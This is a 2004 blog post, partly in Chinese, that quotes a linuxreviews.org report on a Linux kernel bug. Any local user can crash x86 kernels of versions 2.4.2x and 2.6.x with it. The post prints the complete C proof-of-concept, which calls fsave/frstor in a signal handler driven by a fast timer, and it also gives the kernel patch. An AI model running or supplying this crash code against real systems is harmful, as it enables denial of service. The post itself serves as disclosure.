June 17, 2004

New Kernel Crash-Exploit discovered

這大概是 linux kernel 有史以來最嚴重的問題, 幾乎所有版本都有這個缺陷
我試了一台 Mandrake 9.2 的機器, 用一般 user 權限跑 crash kernel 的程式,
馬上見效
修正方法
修正 include/asm-i386/i387.h
asm volatile("fwait"); \
改成
asm volatile("fnclex ; fwait"); \

新的 2.6.7 已修正這個問題

http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html

Published 2004-06-11 by xiando, v2.2.4, last updated 2004-06-15.

A bug lets a simple C program crash the Linux kernel, effectively
locking the whole system. Affects both 2.4.2x and 2.6.x kernels
on the x86 architecture.

The kernel is the most important part of the Linux operating system.
It handles communication with the computers hardware and decides
the priority of running programs (processes). If the kernels stops
doing it's job, everything else will too.

※ The Evil Code

Running this simple C program crashes the Linux kernel.

crash.c.txt
http://linuxreviews.org/news/2004-06-11_kernel_crash/crash.c.txt

  #include 
  #include 
  #include 

static void Handler(int ignore)
{
char fpubuf[108];
__asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
write(2, "*", 1);
__asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
}

int main(int argc, char *argv[])
{
struct itimerval spec;
signal(SIGALRM, Handler);
spec.it_interval.tv_sec=0;
spec.it_interval.tv_usec=100;
spec.it_value.tv_sec=0;
spec.it_value.tv_usec=100;
setitimer(ITIMER_REAL, &spec, NULL);
while(1)
write(1, ".", 1);

return 0;
}


This bug is confirmed to be present when the code is compiled with
GCC version 2.96, 3.0, 3.1, 3.2, 3.3 and 3.3.2 and used on Linux
kernel versions 2.4.2x and 2.6.x on x86 and amd64 systems.

Posted by pank at June 17, 2004 03:39 PM
Comments
Post a comment













Remember personal info?